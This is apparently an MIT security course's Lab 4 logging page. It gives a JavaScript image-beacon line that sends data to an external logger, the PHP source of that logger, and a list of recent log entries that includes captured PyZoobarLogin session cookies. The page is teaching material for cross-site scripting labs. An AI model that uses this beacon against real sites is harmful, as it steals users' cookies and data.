You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.858/2022/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Thu, 08 Feb 2024 19:56:52 -0500: my-username: some-string Thu, 08 Feb 2024 17:27:41 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390 Thu, 08 Feb 2024 17:20:46 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390 Thu, 08 Feb 2024 16:50:11 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390 Thu, 08 Feb 2024 14:51:40 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390 Thu, 08 Feb 2024 14:51:26 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390 Thu, 08 Feb 2024 14:51:17 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390 Thu, 08 Feb 2024 14:51:09 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390 Thu, 08 Feb 2024 14:50:28 -0500: rollhens: PyZoobarLogin=attacker#a6eea096f5dc776e9e71ddec1808a390 Thu, 08 Feb 2024 14:43:03 -0500: rollhens: PyZoobarLogin=attacker#239acc7bc484d98518569b656afdab9d Thu, 08 Feb 2024 14:23:48 -0500: my-username: some-string Thu, 08 Feb 2024 14:14:08 -0500: my-username: some-string Thu, 08 Feb 2024 14:12:32 -0500: rollhens: anything Thu, 08 Feb 2024 14:11:47 -0500: rollhens: grader#6f48488db081f989df80914e49b45e83 Tue, 23 Jan 2024 03:52:09 -0500: test: PyZoobarLogin=grader#fd6c8a524f411982bd4f35624ffeb631 Tue, 23 Jan 2024 03:52:04 -0500: test: PyZoobarLogin=grader#8ad06fac69108b9eb668b0e9547fae22 Tue, 23 Jan 2024 03:51:55 -0500: test: PyZoobarLogin=grader#0d7b7b55efe4de39d32cd5e42560f015 Tue, 23 Jan 2024 03:46:40 -0500: test: PyZoobarLogin=grader#1b99b3224cfa192f75f92b0a0faea40f Tue, 23 Jan 2024 03:46:35 -0500: test: PyZoobarLogin=grader#ea844c2f531bec27c0bdcb23cb7952a9 Tue, 23 Jan 2024 03:46:26 -0500: test: PyZoobarLogin=grader#f950b04232ef4e8c85b4d65288d04d45 Tue, 23 Jan 2024 03:26:21 -0500: test: PyZoobarLogin=grader#a647d38c4f85735565c8bd477aa678ea Tue, 23 Jan 2024 03:26:16 -0500: test: PyZoobarLogin=grader#89aaf043051a98511c2fec0ec6935c94 Tue, 23 Jan 2024 03:26:06 -0500: test: PyZoobarLogin=grader#25dd0471c0576af3c4cf787f1f93759b Tue, 23 Jan 2024 03:19:39 -0500: test: www-www Tue, 23 Jan 2024 03:18:17 -0500: test: 111-111 Tue, 23 Jan 2024 03:17:22 -0500: test: testtestst-2 Tue, 23 Jan 2024 03:10:16 -0500: test: 1234-12345 Tue, 23 Jan 2024 03:03:44 -0500: test: 12345-12345 Tue, 23 Jan 2024 03:02:54 -0500: test: 12345-12345 Tue, 23 Jan 2024 02:56:38 -0500: test: 123-12345 Tue, 23 Jan 2024 02:39:25 -0500: test: 12345-12345 Tue, 23 Jan 2024 02:39:19 -0500: test: 12345-12345 Tue, 23 Jan 2024 02:39:13 -0500: test: 12345-12345 Tue, 23 Jan 2024 02:39:07 -0500: test: 12345-12345 Tue, 23 Jan 2024 02:39:01 -0500: test: 12345-12345 Tue, 23 Jan 2024 02:34:30 -0500: test: test-test2 Tue, 23 Jan 2024 02:26:20 -0500: test: 123-12345 Tue, 23 Jan 2024 02:25:47 -0500: test: 123-12345 Tue, 23 Jan 2024 02:25:27 -0500: test: 123- Tue, 23 Jan 2024 02:21:19 -0500: test: 123-1234 Tue, 23 Jan 2024 02:21:16 -0500: test: 123- Tue, 23 Jan 2024 02:00:20 -0500: test: PyZoobarLogin=test#2c163d25cdb449efd8a5b7f2983b0862 Tue, 23 Jan 2024 01:58:45 -0500: test: PyZoobarLogin=test#2c163d25cdb449efd8a5b7f2983b0862 Tue, 23 Jan 2024 01:40:41 -0500: test: PyZoobarLogin=grader#2f8e65d359b1559a3b273cf950dab4e1 Tue, 23 Jan 2024 01:40:35 -0500: test: PyZoobarLogin=grader#db5ffcaeaba860b69edb3638b6650e52 Tue, 23 Jan 2024 01:40:26 -0500: test: PyZoobarLogin=grader#cf4d3d683d01a5e7cb1f79cd55b51a67 Tue, 23 Jan 2024 01:39:46 -0500: test: PyZoobarLogin=test#aa55f9af1f227e8cf1d42d5b19f5a4a8 Tue, 23 Jan 2024 01:35:27 -0500: test: PyZoobarLogin=test#aa55f9af1f227e8cf1d42d5b19f5a4a8 Tue, 23 Jan 2024 01:23:30 -0500: test: PyZoobarLogin=test#aa55f9af1f227e8cf1d42d5b19f5a4a8
In case you are curious, here is the source code of this page.
<?php
do {
if (!array_key_exists("id", $_REQUEST)) {
break;
}
$id = $_REQUEST['id'];
if (strlen($id) > 1000) {
header("HTTP/1.0 413 Payload Too Large");
echo "ID value is larger than 1000 bytes";
return;
}
if (!array_key_exists("payload", $_REQUEST)) {
header("HTTP/1.0 400 Bad Request");
echo "No payload given";
return;
}
$payload = $_REQUEST['payload'];
if (empty($payload)) {
header("HTTP/1.0 400 Bad Request");
echo "Empty payload given";
return;
}
if (strlen($payload) > 1000) {
header("HTTP/1.0 413 Payload Too Large");
echo "Payload is larger than 1000 bytes";
return;
}
if (!function_exists('apcu_add')) {
header("HTTP/1.0 501 Not Implemented");
echo "APCu not enabled, so no rate limiting; refusing all requests";
return;
}
if (apcu_add($payload, true, 5) === false) {
// exact same $payload was sent in the past 5 seconds
header("HTTP/1.0 429 Too Many Requests");
echo "That exact payload was sent very recently; rejecting";
return;
}
$payload = str_replace(array("\n", "\r"), '.', $payload);
$id = str_replace(array("\n", "\r"), '.', $id);
$file = fopen("/tmp/6.858-logger.txt", "c+");
if ($file === false) {
header("HTTP/1.0 503 Service Unavailable");
echo "Failed to open log file";
return;
}
if (!flock($file, LOCK_EX)) {
header("HTTP/1.0 503 Service Unavailable");
echo "Failed to lock log file";
return;
}
$lines = array();
while (!feof($file) && count($lines) < 100) {
$lines[] = fgets($file);
}
ftruncate($file, 0);
rewind($file);
fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
foreach ($lines as &$line) {
fwrite($file, $line);
}
flock($file, LOCK_UN);
fclose($file);
echo "Logged!";
return;
} while(0);
$link = "(new Image()).src="
. "'https://css.csail.mit.edu/6.858/2022/labs/log.php?'"
. " + 'id=my-username'"
. " + '&payload=some-string' + '&random='"
. " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" type="text/css" href="labs.css" />
<title>Lab 4 Logging Script</title>
</head>
<body>
<h1>Lab 4 Logging Script</h1>
<p>
You can use this server side script to extract data from
client-side JavaScript. For example, clicking this client-side
hyperlink will cause the server to log the payload:
</p>
<pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
<p>
The random argument is ignored, but ensures that the browser
bypasses its cache when downloading the image. We suggest that you
use the random argument in your scripts as well. The ID argument
will help you distinguish your log entries from those sent by other
students; we suggest picking your MIT Athena username. Newlines are not
allowed in <tt>javascript:</tt> links; if this bothers you, try
<a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
</p>
<h2>Test form</h2>
<p>
If you just want to try out the script, you can use this form.
(For your actual attacks in lab 4, you'll probably want to use the
JavaScript image technique shown above.)
</p>
<form method="GET" action="">
<label for="id">ID:</label><br />
<input name="id" placeholder="your-mit-username" size="40" />
<i>(some identifier to locate your payload in the log)</i>
<br />
<br />
<label for="payload">Payload:</label><br />
<input name="payload" placeholder="some-string" size="40" />
<i>(the information you stole)</i>
<br />
<input type="submit" value="Log" name="log_submit" />
</form>
<h2>Logged entries</h2>
<p>
Below are the most recent logged entries, so that you can check
if your attack worked:
</p>
<pre class="tty"><?php
$lines = file_get_contents("/tmp/6.858-logger.txt");
echo htmlspecialchars($lines);
?></pre>
<h2>Source code</h2>
<p>In case you are curious, here is the source code of this page.</p>
<pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>